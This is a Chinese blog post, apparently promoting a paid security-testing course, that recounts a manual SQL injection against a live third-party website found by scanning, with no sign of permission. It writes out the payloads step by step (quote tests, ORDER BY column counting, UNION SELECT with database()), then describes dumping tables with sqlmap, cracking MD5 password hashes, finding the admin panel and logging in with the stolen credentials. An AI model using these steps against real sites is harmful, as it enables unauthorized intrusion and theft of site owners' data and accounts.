php获取当前登录者的角色_从找漏洞到登录网站后台,一次简单的手动注入漏洞挖掘实战...

57e69826121d4386c59bcd6540e3f309.gif

19699d4f8d99877f8dff04f390efb2b6.gif

起因:

前几天在对某一个站点进行信息搜集的时候,在C段(同网段如192.168.1-255中所有ip)的信息里面发现了某一个站点,当时看见了:

url:http://www.xxx..com/class.php?id=104

忍不住加了一个单引号来测试是否存在注入漏洞。

5936fd827cbe616ac03da37fb9e87185.png 

加了单引号之后没有返回信息,果不其然,存在注入漏洞

6b9ec91259fb6f9540669607e2f10b42.png 

0b6c90764947eb3c05f6fc485e4a3271.png

既然来都来了,那就来一波手动fuzz,通过手动的方式获取敏感信息吧,正好可以和大家分享一下如何手动注入。

正常的报错注入流程一般都是:

先判断注入点、注入点闭合列数判断、得到库信息、表信息、字段信息,最后再对字段信息进行解密可以得到管理员的账号和密码。

13fbedfefc064141420563f2f543f331.png

测试注入点

1. 首先是测试注入点在哪,这个是正常界面下返回的信息,一切正常

http://www.xxx..com/class.php?id=104

290f2991965eddd965a43939cb777b34.png

2. 常见的闭合方法测试

http://www.xxx..com/class.php?id=104’--+

http://www.xxx..com/class.php?id=104” --+

http://www.xxx..com/class.php?id=104’) --+

这些经过测试发现均返回错误页面,也就证明闭合失败,无法成功闭合

0b6c90764947eb3c05f6fc485e4a3271.png

如果不想那么复杂的话,是不是好点?直接用order by语句判断列数

过程如下:

  • http://www.xxx.com/list.php?id=104 order by 30 --+ 返回界面异常

  • http://www.xxx.com/list.php?id=104 order by 15 --+ 返回界面正常

  • http://www.xxx.com/list.php?id=104 order by 20 --+  返回界面异常

  • 。。。。

最后通过简单的二分法测试得到当order by 22 --+ 的时候返回是正常的,因此存在22列。

3e48a4fb55e873ebd1e92812e9cc6bc4.png

既然知道了存在22列,使用hackbar中的联合注入工具来判断报错注入可回显注入的点。

http://www.xxx.com/list.php?id=-1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 --+

d81491b9707b3823aafe2a34c67e0124.png

判断出了16的位置是可以回显报错数据的,因此可以使用16这个位置来获取所需要的数据。

7813dff30ae8c4627ca01119a0689918.png 

首先获取当前的数据库信息,获取到当前使用数据库名xxxw_cn

http://www.xxx.com/list.php?id=-1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,

15,database(),17,18,19,20,21,22 --+

b497a956f265701b5c311197c1261bc7.png

接下来使用同样的手段去获得表和字段信息,在这里不再进行赘述。

sqlmap一把梭

不是所有的注入都是适合手动去做的,这里还是用sqlmap吧,一把梭。。。

首先是payload

aca1a69c7d3de8bee87d7c23fc509541.png

获取库中的表信息

c91fe0cddf1d023f3fb662b4934c14e5.png

获取库中的表信息

600b9f642de159870dae3d955d0bf81d.png

获取表中的字段信息,获取字段信息之后将password在md5解密平台进行解密,常见的md5解密平台有

  • https://cmd5.com/(需要注册,功能强大,难度较大的需要收费解密)

  • https://www.somd5.com/(免费)

  • https://pmd5.com/(免费)

27cd605b08685f163795d6cf1e47bfd8.png

后台的查找上,直接在域名后面加admin是无法跳转到后台的。

ab6ec5d2dc6c562f02e3f64c63d3b474.png 1099f7952ce1d2ffafc5c98410c7938e.png

这里有一个小技巧,直接使用搜索引擎去搜索,针不戳,直接就找到了

6c366b289f52c0e1d5b615c3078ee42e.png

直接使用用户的数据登录后台

 144e13d9b1d620c5b78b27850f5eb615.png

由此可见网站安全的重要性,因为安全测试的不可或缺,相关岗位人才缺口达100多万

掌握安全测试到底有什么用?这就意味着你简历投出去就会被各种大厂抢着要!

经过6个月的调研与筹备,由柠檬班金牌讲师历时6年沉淀,专为1~5年测试经验的同学量身打造的安全测试首期课程,现在正式进入报名倒计时最后3天

eae121145b712f3f16fccaa476148ef1.png

我们的Cat老师来自于技术一线岗位,深耕技术多年,负责过多次网络安全项目,有红队和蓝队两方面经验,参与过多次公安部组织的国家级攻防演练,在国内网络安全圈子内颇负盛名。

c3a807b6357eefe988a5ee53c8ec077c.png

由于Cat老师目前都在负责重要安全项目,出于保密协议,老师的照片我们不会公布!

关于安全测试课程内容,扫码添加我们的罗罗老师了解更多课程详情吧~

9b786285408257acb123b31696869627.png

8682da78320c2a855e8caeea8a982c07.png e27c5a238b868b23e2d7ebe1089adba2.png 8682da78320c2a855e8caeea8a982c07.png

b6564800b54a1305c741a4303f0a1ae2.png

a56d17cc81d1b1e9982d1760458ca285.png

18e05895135a7f842a2f231e401da6dc.png

6b617b5194463b9065d173ae0c9805e2.png

ff343fe0a518d77e8843934a62c82e17.gif

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值